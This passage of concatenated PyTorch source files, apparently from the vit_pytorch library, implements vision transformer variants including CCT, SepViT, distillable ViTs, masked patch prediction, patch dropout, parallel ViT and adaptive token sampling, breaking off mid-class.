DropPath(nn.Module): def __init__(self, drop_prob=None): super().__init__() self.drop_prob = float(drop_prob) def forward(self, x): batch, drop_prob, device, dtype = x.shape[0], self.drop_prob, x.device, x.dtype if drop_prob <= 0. or not self.training: return x keep_prob = 1 - self.drop_prob shape = (batch, *((1,) * (x.ndim - 1))) keep_mask = torch.zeros(shape, device = device).float().uniform_(0, 1) < keep_prob output = x.div(keep_prob) * keep_mask.float() return output class Tokenizer(nn.Module): def __init__( self, frame_kernel_size, kernel_size, stride, padding, frame_stride=1, frame_pooling_stride=1, frame_pooling_kernel_size=1, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, n_conv_layers=1, n_input_channels=3, n_output_channels=64, in_planes=64, activation=None, max_pool=True, conv_bias=False ): super().__init__() n_filter_list = [n_input_channels] + \ [in_planes for _ in range(n_conv_layers - 1)] + \ [n_output_channels] n_filter_list_pairs = zip(n_filter_list[:-1], n_filter_list[1:]) self.conv_layers = nn.Sequential( *[nn.Sequential( nn.Conv3d(chan_in, chan_out, kernel_size=(frame_kernel_size, kernel_size, kernel_size), stride=(frame_stride, stride, stride), padding=(frame_kernel_size // 2, padding, padding), bias=conv_bias), nn.Identity() if not exists(activation) else activation(), nn.MaxPool3d(kernel_size=(frame_pooling_kernel_size, pooling_kernel_size, pooling_kernel_size), stride=(frame_pooling_stride, pooling_stride, pooling_stride), padding=(frame_pooling_kernel_size // 2, pooling_padding, pooling_padding)) if max_pool else nn.Identity() ) for chan_in, chan_out in n_filter_list_pairs ]) self.apply(self.init_weight) def sequence_length(self, n_channels=3, frames=8, height=224, width=224): return self.forward(torch.zeros((1, n_channels, frames, height, width))).shape[1] def forward(self, x): x = self.conv_layers(x) return rearrange(x, 'b c f h w -> b (f h w) c') @staticmethod def init_weight(m): if isinstance(m, nn.Conv3d): nn.init.kaiming_normal_(m.weight) class TransformerClassifier(nn.Module): def __init__( self, seq_pool=True, embedding_dim=768, num_layers=12, num_heads=12, mlp_ratio=4.0, num_classes=1000, dropout_rate=0.1, attention_dropout=0.1, stochastic_depth_rate=0.1, positional_embedding='sine', sequence_length=None, *args, **kwargs ): super().__init__() assert positional_embedding in {'sine', 'learnable', 'none'} dim_feedforward = int(embedding_dim * mlp_ratio) self.embedding_dim = embedding_dim self.sequence_length = sequence_length self.seq_pool = seq_pool assert exists(sequence_length) or positional_embedding == 'none', \ f"Positional embedding is set to {positional_embedding} and" \ f" the sequence length was not specified." if not seq_pool: sequence_length += 1 self.class_emb = nn.Parameter(torch.zeros(1, 1, self.embedding_dim)) else: self.attention_pool = nn.Linear(self.embedding_dim, 1) if positional_embedding == 'none': self.positional_emb = None elif positional_embedding == 'learnable': self.positional_emb = nn.Parameter(torch.zeros(1, sequence_length, embedding_dim)) nn.init.trunc_normal_(self.positional_emb, std = 0.2) else: self.register_buffer('positional_emb', sinusoidal_embedding(sequence_length, embedding_dim)) self.dropout = nn.Dropout(p=dropout_rate) dpr = [x.item() for x in torch.linspace(0, stochastic_depth_rate, num_layers)] self.blocks = nn.ModuleList([ TransformerEncoderLayer(d_model=embedding_dim, nhead=num_heads, dim_feedforward=dim_feedforward, dropout=dropout_rate, attention_dropout=attention_dropout, drop_path_rate=layer_dpr) for layer_dpr in dpr]) self.norm = nn.LayerNorm(embedding_dim) self.fc = nn.Linear(embedding_dim, num_classes) self.apply(self.init_weight) @staticmethod def init_weight(m): if isinstance(m, nn.Linear): nn.init.trunc_normal_(m.weight, std=.02) if isinstance(m, nn.Linear) and exists(m.bias): nn.init.constant_(m.bias, 0) elif isinstance(m, nn.LayerNorm): nn.init.constant_(m.bias, 0) nn.init.constant_(m.weight, 1.0) def forward(self, x): b = x.shape[0] if not exists(self.positional_emb) and x.size(1) < self.sequence_length: x = F.pad(x, (0, 0, 0, self.n_channels - x.size(1)), mode='constant', value=0) if not self.seq_pool: cls_token = repeat(self.class_emb, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_token, x), dim=1) if exists(self.positional_emb): x += self.positional_emb x = self.dropout(x) for blk in self.blocks: x = blk(x) x = self.norm(x) if self.seq_pool: attn_weights = rearrange(self.attention_pool(x), 'b n 1 -> b n') x = einsum('b n, b n d -> b d', attn_weights.softmax(dim = 1), x) else: x = x[:, 0] return self.fc(x) # CCT Main model class CCT(nn.Module): def __init__( self, img_size=224, num_frames=8, embedding_dim=768, n_input_channels=3, n_conv_layers=1, frame_stride=1, frame_kernel_size=3, frame_pooling_kernel_size=1, frame_pooling_stride=1, kernel_size=7, stride=2, padding=3, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, *args, **kwargs ): super().__init__() img_height, img_width = pair(img_size) self.tokenizer = Tokenizer( n_input_channels=n_input_channels, n_output_channels=embedding_dim, frame_stride=frame_stride, frame_kernel_size=frame_kernel_size, frame_pooling_stride=frame_pooling_stride, frame_pooling_kernel_size=frame_pooling_kernel_size, kernel_size=kernel_size, stride=stride, padding=padding, pooling_kernel_size=pooling_kernel_size, pooling_stride=pooling_stride, pooling_padding=pooling_padding, max_pool=True, activation=nn.ReLU, n_conv_layers=n_conv_layers, conv_bias=False ) self.classifier = TransformerClassifier( sequence_length=self.tokenizer.sequence_length( n_channels=n_input_channels, frames=num_frames, height=img_height, width=img_width ), embedding_dim=embedding_dim, seq_pool=True, dropout_rate=0., attention_dropout=0.1, stochastic_depth=0.1, *args, **kwargs ) def forward(self, x): x = self.tokenizer(x) return self.classifier(x) File: vit_pytorch/sep_vit.py from functools import partial import torch from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class ChanLayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class OverlappingPatchEmbed(nn.Module): def __init__(self, dim_in, dim_out, stride = 2): super().__init__() kernel_size = stride * 2 - 1 padding = kernel_size // 2 self.conv = nn.Conv2d(dim_in, dim_out, kernel_size, stride = stride, padding = padding) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # feedforward class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() inner_dim = int(dim * mult) self.net = nn.Sequential( ChanLayerNorm(dim), nn.Conv2d(dim, inner_dim, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class DSSA(nn.Module): def __init__( self, dim, heads = 8, dim_head = 32, dropout = 0., window_size = 7 ): super().__init__() self.heads = heads self.scale = dim_head ** -0.5 self.window_size = window_size inner_dim = dim_head * heads self.norm = ChanLayerNorm(dim) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_qkv = nn.Conv1d(dim, inner_dim * 3, 1, bias = False) # window tokens self.window_tokens = nn.Parameter(torch.randn(dim)) # prenorm and non-linearity for window tokens # then projection to queries and keys for window tokens self.window_tokens_to_qk = nn.Sequential( nn.LayerNorm(dim_head), nn.GELU(), Rearrange('b h n c -> b (h c) n'), nn.Conv1d(inner_dim, inner_dim * 2, 1), Rearrange('b (h c) n -> b h n c', h = heads), ) # window attention self.window_attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): """ einstein notation b - batch c - channels w1 - window size (height) w2 - also window size (width) i - sequence dimension (source) j - sequence dimension (target dimension to be reduced) h - heads x - height of feature map divided by window size y - width of feature map divided by window size """ batch, height, width, heads, wsz = x.shape[0], *x.shape[-2:], self.heads, self.window_size assert (height % wsz) == 0 and (width % wsz) == 0, f'height {height} and width {width} must be divisible by window size {wsz}' num_windows = (height // wsz) * (width // wsz) x = self.norm(x) # fold in windows for "depthwise" attention - not sure why it is named depthwise when it is just "windowed" attention x = rearrange(x, 'b c (h w1) (w w2) -> (b h w) c (w1 w2)', w1 = wsz, w2 = wsz) # add windowing tokens w = repeat(self.window_tokens, 'c -> b c 1', b = x.shape[0]) x = torch.cat((w, x), dim = -1) # project for queries, keys, value q, k, v = self.to_qkv(x).chunk(3, dim = 1) # split out heads q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) d', h = heads), (q, k, v)) # scale q = q * self.scale # similarity dots = einsum('b h i d, b h j d -> b h i j', q, k) # attention attn = self.attend(dots) # aggregate values out = torch.matmul(attn, v) # split out windowed tokens window_tokens, windowed_fmaps = out[:, :, 0], out[:, :, 1:] # early return if there is only 1 window if num_windows == 1: fmap = rearrange(windowed_fmaps, '(b x y) h (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz, y = width // wsz, w1 = wsz, w2 = wsz) return self.to_out(fmap) # carry out the pointwise attention, the main novelty in the paper window_tokens = rearrange(window_tokens, '(b x y) h d -> b h (x y) d', x = height // wsz, y = width // wsz) windowed_fmaps = rearrange(windowed_fmaps, '(b x y) h n d -> b h (x y) n d', x = height // wsz, y = width // wsz) # windowed queries and keys (preceded by prenorm activation) w_q, w_k = self.window_tokens_to_qk(window_tokens).chunk(2, dim = -1) # scale w_q = w_q * self.scale # similarities w_dots = einsum('b h i d, b h j d -> b h i j', w_q, w_k) w_attn = self.window_attend(w_dots) # aggregate the feature maps from the "depthwise" attention step (the most interesting part of the paper, one i haven't seen before) aggregated_windowed_fmap = einsum('b h i j, b h j w d -> b h i w d', w_attn, windowed_fmaps) # fold back the windows and then combine heads for aggregation fmap = rearrange(aggregated_windowed_fmap, 'b h (x y) (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz, y = width // wsz, w1 = wsz, w2 = wsz) return self.to_out(fmap) class Transformer(nn.Module): def __init__( self, dim, depth, dim_head = 32, heads = 8, ff_mult = 4, dropout = 0., norm_output = True ): super().__init__() self.layers = nn.ModuleList([]) for ind in range(depth): self.layers.append(nn.ModuleList([ DSSA(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mult = ff_mult, dropout = dropout), ])) self.norm = ChanLayerNorm(dim) if norm_output else nn.Identity() def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SepViT(nn.Module): def __init__( self, *, num_classes, dim, depth, heads, window_size = 7, dim_head = 32, ff_mult = 4, channels = 3, dropout = 0. ): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (channels, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) strides = (4, *((2,) * (num_stages - 1))) hyperparams_per_stage = [heads, window_size] hyperparams_per_stage = list(map(partial(cast_tuple, length = num_stages), hyperparams_per_stage)) assert all(tuple(map(lambda arr: len(arr) == num_stages, hyperparams_per_stage))) self.layers = nn.ModuleList([]) for ind, ((layer_dim_in, layer_dim), layer_depth, layer_stride, layer_heads, layer_window_size) in enumerate(zip(dim_pairs, depth, strides, *hyperparams_per_stage)): is_last = ind == (num_stages - 1) self.layers.append(nn.ModuleList([ OverlappingPatchEmbed(layer_dim_in, layer_dim, stride = layer_stride), PEG(layer_dim), Transformer(dim = layer_dim, depth = layer_depth, heads = layer_heads, ff_mult = ff_mult, dropout = dropout, norm_output = not is_last), ])) self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): for ope, peg, transformer in self.layers: x = ope(x) x = peg(x) x = transformer(x) return self.mlp_head(x) File: vit_pytorch/distill.py import torch from torch import nn from torch.nn import Module import torch.nn.functional as F from vit_pytorch.vit import ViT from vit_pytorch.t2t import T2TViT from vit_pytorch.efficient import ViT as EfficientViT from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d # classes class DistillMixin: def forward(self, img, distill_token = None): distilling = exists(distill_token) x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim = 1) x += self.pos_embedding[:, :(n + 1)] if distilling: distill_tokens = repeat(distill_token, '1 n d -> b n d', b = b) x = torch.cat((x, distill_tokens), dim = 1) x = self._attend(x) if distilling: x, distill_tokens = x[:, :-1], x[:, -1] x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) out = self.mlp_head(x) if distilling: return out, distill_tokens return out class DistillableViT(DistillMixin, ViT): def __init__(self, *args, **kwargs): super(DistillableViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = ViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) return v def _attend(self, x): x = self.dropout(x) x = self.transformer(x) return x class DistillableT2TViT(DistillMixin, T2TViT): def __init__(self, *args, **kwargs): super(DistillableT2TViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = T2TViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) return v def _attend(self, x): x = self.dropout(x) x = self.transformer(x) return x class DistillableEfficientViT(DistillMixin, EfficientViT): def __init__(self, *args, **kwargs): super(DistillableEfficientViT, self).__init__(*args, **kwargs) self.args = args self.kwargs = kwargs self.dim = kwargs['dim'] self.num_classes = kwargs['num_classes'] def to_vit(self): v = EfficientViT(*self.args, **self.kwargs) v.load_state_dict(self.state_dict()) return v def _attend(self, x): return self.transformer(x) # knowledge distillation wrapper class DistillWrapper(Module): def __init__( self, *, teacher, student, temperature = 1., alpha = 0.5, hard = False, mlp_layernorm = False ): super().__init__() assert (isinstance(student, (DistillableViT, DistillableT2TViT, DistillableEfficientViT))) , 'student must be a vision transformer' self.teacher = teacher self.student = student dim = student.dim num_classes = student.num_classes self.temperature = temperature self.alpha = alpha self.hard = hard self.distillation_token = nn.Parameter(torch.randn(1, 1, dim)) self.distill_mlp = nn.Sequential( nn.LayerNorm(dim) if mlp_layernorm else nn.Identity(), nn.Linear(dim, num_classes) ) def forward(self, img, labels, temperature = None, alpha = None, **kwargs): alpha = default(alpha, self.alpha) T = default(temperature, self.temperature) with torch.no_grad(): teacher_logits = self.teacher(img) student_logits, distill_tokens = self.student(img, distill_token = self.distillation_token, **kwargs) distill_logits = self.distill_mlp(distill_tokens) loss = F.cross_entropy(student_logits, labels) if not self.hard: distill_loss = F.kl_div( F.log_softmax(distill_logits / T, dim = -1), F.softmax(teacher_logits / T, dim = -1).detach(), reduction = 'batchmean') distill_loss *= T ** 2 else: teacher_labels = teacher_logits.argmax(dim = -1) distill_loss = F.cross_entropy(distill_logits, teacher_labels) return loss * (1 - alpha) + distill_loss * alpha File: vit_pytorch/mpp.py import math import torch from torch import nn import torch.nn.functional as F from einops import rearrange, repeat, reduce # helpers def exists(val): return val is not None def prob_mask_like(t, prob): batch, seq_length, _ = t.shape return torch.zeros((batch, seq_length)).float().uniform_(0, 1) < prob def get_mask_subset_with_prob(patched_input, prob): batch, seq_len, _, device = *patched_input.shape, patched_input.device max_masked = math.ceil(prob * seq_len) rand = torch.rand((batch, seq_len), device=device) _, sampled_indices = rand.topk(max_masked, dim=-1) new_mask = torch.zeros((batch, seq_len), device=device) new_mask.scatter_(1, sampled_indices, 1) return new_mask.bool() # mpp loss class MPPLoss(nn.Module): def __init__( self, patch_size, channels, output_channel_bits, max_pixel_val, mean, std ): super().__init__() self.patch_size = patch_size self.channels = channels self.output_channel_bits = output_channel_bits self.max_pixel_val = max_pixel_val self.mean = torch.tensor(mean).view(-1, 1, 1) if mean else None self.std = torch.tensor(std).view(-1, 1, 1) if std else None def forward(self, predicted_patches, target, mask): p, c, mpv, bits, device = self.patch_size, self.channels, self.max_pixel_val, self.output_channel_bits, target.device bin_size = mpv / (2 ** bits) # un-normalize input if exists(self.mean) and exists(self.std): target = target * self.std + self.mean # reshape target to patches target = target.clamp(max = mpv) # clamp just in case avg_target = reduce(target, 'b c (h p1) (w p2) -> b (h w) c', 'mean', p1 = p, p2 = p).contiguous() channel_bins = torch.arange(bin_size, mpv, bin_size, device = device) discretized_target = torch.bucketize(avg_target, channel_bins) bin_mask = (2 ** bits) ** torch.arange(0, c, device = device).long() bin_mask = rearrange(bin_mask, 'c -> () () c') target_label = torch.sum(bin_mask * discretized_target, dim = -1) loss = F.cross_entropy(predicted_patches[mask], target_label[mask]) return loss # main class class MPP(nn.Module): def __init__( self, transformer, patch_size, dim, output_channel_bits=3, channels=3, max_pixel_val=1.0, mask_prob=0.15, replace_prob=0.5, random_patch_prob=0.5, mean=None, std=None ): super().__init__() self.transformer = transformer self.loss = MPPLoss(patch_size, channels, output_channel_bits, max_pixel_val, mean, std) # extract patching function self.patch_to_emb = nn.Sequential(transformer.to_patch_embedding[1:]) # output transformation self.to_bits = nn.Linear(dim, 2**(output_channel_bits * channels)) # vit related dimensions self.patch_size = patch_size # mpp related probabilities self.mask_prob = mask_prob self.replace_prob = replace_prob self.random_patch_prob = random_patch_prob # token ids self.mask_token = nn.Parameter(torch.randn(1, 1, channels * patch_size ** 2)) def forward(self, input, **kwargs): transformer = self.transformer # clone original image for loss img = input.clone().detach() # reshape raw image to patches p = self.patch_size input = rearrange(input, 'b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1=p, p2=p) mask = get_mask_subset_with_prob(input, self.mask_prob) # mask input with mask patches with probability of `replace_prob` (keep patches the same with probability 1 - replace_prob) masked_input = input.clone().detach() # if random token probability > 0 for mpp if self.random_patch_prob > 0: random_patch_sampling_prob = self.random_patch_prob / ( 1 - self.replace_prob) random_patch_prob = prob_mask_like(input, random_patch_sampling_prob).to(mask.device) bool_random_patch_prob = mask * (random_patch_prob == True) random_patches = torch.randint(0, input.shape[1], (input.shape[0], input.shape[1]), device=input.device) randomized_input = masked_input[ torch.arange(masked_input.shape[0]).unsqueeze(-1), random_patches] masked_input[bool_random_patch_prob] = randomized_input[ bool_random_patch_prob] # [mask] input replace_prob = prob_mask_like(input, self.replace_prob).to(mask.device) bool_mask_replace = (mask * replace_prob) == True masked_input[bool_mask_replace] = self.mask_token # linear embedding of patches masked_input = self.patch_to_emb(masked_input) # add cls token to input sequence b, n, _ = masked_input.shape cls_tokens = repeat(transformer.cls_token, '() n d -> b n d', b=b) masked_input = torch.cat((cls_tokens, masked_input), dim=1) # add positional embeddings to input masked_input += transformer.pos_embedding[:, :(n + 1)] masked_input = transformer.dropout(masked_input) # get generator output and get mpp loss masked_input = transformer.transformer(masked_input, **kwargs) cls_logits = self.to_bits(masked_input) logits = cls_logits[:, 1:, :] mpp_loss = self.loss(logits, img, mask) return mpp_loss File: vit_pytorch/vit_with_patch_dropout.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class PatchDropout(nn.Module): def __init__(self, prob): super().__init__() assert 0 <= prob < 1. self.prob = prob def forward(self, x): if not self.training or self.prob == 0.: return x b, n, _, device = *x.shape, x.device batch_indices = torch.arange(b, device = device) batch_indices = rearrange(batch_indices, '... -> ... 1') num_patches_keep = max(1, int(n * (1 - self.prob))) patch_indices_keep = torch.randn(b, n, device = device).topk(num_patches_keep, dim = -1).indices return x[batch_indices, patch_indices_keep] class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., patch_dropout = 0.25): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.Linear(patch_dim, dim), ) self.pos_embedding = nn.Parameter(torch.randn(num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.patch_dropout = PatchDropout(patch_dropout) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding x = self.patch_dropout(x) cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/parallel_vit.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class Parallel(nn.Module): def __init__(self, *fns): super().__init__() self.fns = nn.ModuleList(fns) def forward(self, x): return sum([fn(x) for fn in self.fns]) class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, num_parallel_branches = 2, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) attn_block = lambda: Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout) ff_block = lambda: FeedForward(dim, mlp_dim, dropout = dropout) for _ in range(depth): self.layers.append(nn.ModuleList([ Parallel(*[attn_block() for _ in range(num_parallel_branches)]), Parallel(*[ff_block() for _ in range(num_parallel_branches)]), ])) def forward(self, x): for attns, ffs in self.layers: x = attns(x) + x x = ffs(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', num_parallel_branches = 2, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.Linear(patch_dim, dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, num_parallel_branches, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/ats_vit.py import torch import torch.nn.functional as F from torch.nn.utils.rnn import pad_sequence from torch import nn, einsum from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # adaptive token sampling functions and classes def log(t, eps = 1e-6): return torch.log(t + eps) def sample_gumbel(shape, device, dtype, eps = 1e-6): u = torch.empty(shape, device = device, dtype = dtype).uniform_(0, 1) return -log(-log(u, eps), eps) def batched_index_select(values, indices, dim = 1): value_dims = values.shape[(dim + 1):] values_shape, indices_shape = map(lambda t: list(t.shape), (values, indices)) indices = indices[(..., *((None,) * len(value_dims)))] indices = indices.expand(*((-1,) * len(indices_shape)), *value_dims) value_expand_len = len(indices_shape) - (dim + 1) values = values[(*((slice(None),) * dim), *((None,) * value_expand_len), ...)] value_expand_shape = [-1] * len(values.shape) expand_slice = slice(dim, (dim + value_expand_len)) value_expand_shape[expand_slice] = indices.shape[expand_slice] values = values.expand(*value_expand_shape) dim += value_expand_len return values.gather(dim, indices) class AdaptiveTokenSampling(nn.Module): def __init__(self, output_num_tokens, eps = 1e-6): super().__init__() self.eps = eps self.output_num_tokens = output_num_tokens def forward(self, attn, value, mask): heads, output_num_tokens, eps, device, dtype = attn.shape[1], self.output_num_tokens, self.eps, attn.device, attn.dtype # first get the attention values for CLS token to all other tokens cls_attn = attn[..., 0, 1:] # calculate the norms of the values, for weighting the scores, as described in the paper value_norms = value[..., 1:, :].norm(dim = -1) # weigh the attention scores by the norm of the values, sum across all heads cls_attn = einsum('b h n, b h n -> b n', cls_attn, value_norms) # normalize to 1 normed_cls_attn = cls_attn / (cls_attn.sum(dim = -1, keepdim = True) + eps) # instead of using inverse transform sampling, going to invert the softmax and use gumbel-max sampling instead pseudo_logits = log(normed_cls_attn) # mask out pseudo logits for gumbel-max sampling mask_without_cls = mask[:, 1:] mask_value = -torch.finfo(attn.dtype).max / 2 pseudo_logits = pseudo_logits.masked_fill(~mask_without_cls, mask_value) # expand k times, k being the adaptive sampling number pseudo_logits = repeat(pseudo_logits, 'b n -> b k n', k = output_num_tokens) pseudo_logits = pseudo_logits + sample_gumbel(pseudo_logits.shape, device = device, dtype = dtype) # gumble-max and add one to reserve 0 for padding / mask sampled_token_ids = pseudo_logits.argmax(dim = -1) + 1 # calculate unique using torch.unique and then pad the sequence from the right unique_sampled_token_ids_list = [torch.unique(t, sorted = True) for t in torch.unbind(sampled_token_ids)] unique_sampled_token_ids = pad_sequence(unique_sampled_token_ids_list, batch_first = True) # calculate the new mask, based on the padding new_mask = unique_sampled_token_ids != 0 # CLS token never gets masked out (gets a value of True) new_mask = F.pad(new_mask, (1, 0), value = True) # prepend a 0 token id to keep the CLS attention scores unique_sampled_token_ids = F.pad(unique_sampled_token_ids, (1, 0), value = 0) expanded_unique_sampled_token_ids = repeat(unique_sampled_token_ids, 'b n -> b h n', h = heads) # gather the new attention scores new_attn = batched_index_select(attn, expanded_unique_sampled_token_ids, dim = 2) # return the sampled attention scores, new mask (denoting padding), as well as the sampled token indices (for the residual) return new_attn, new_mask, unique_sampled_token_ids # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), 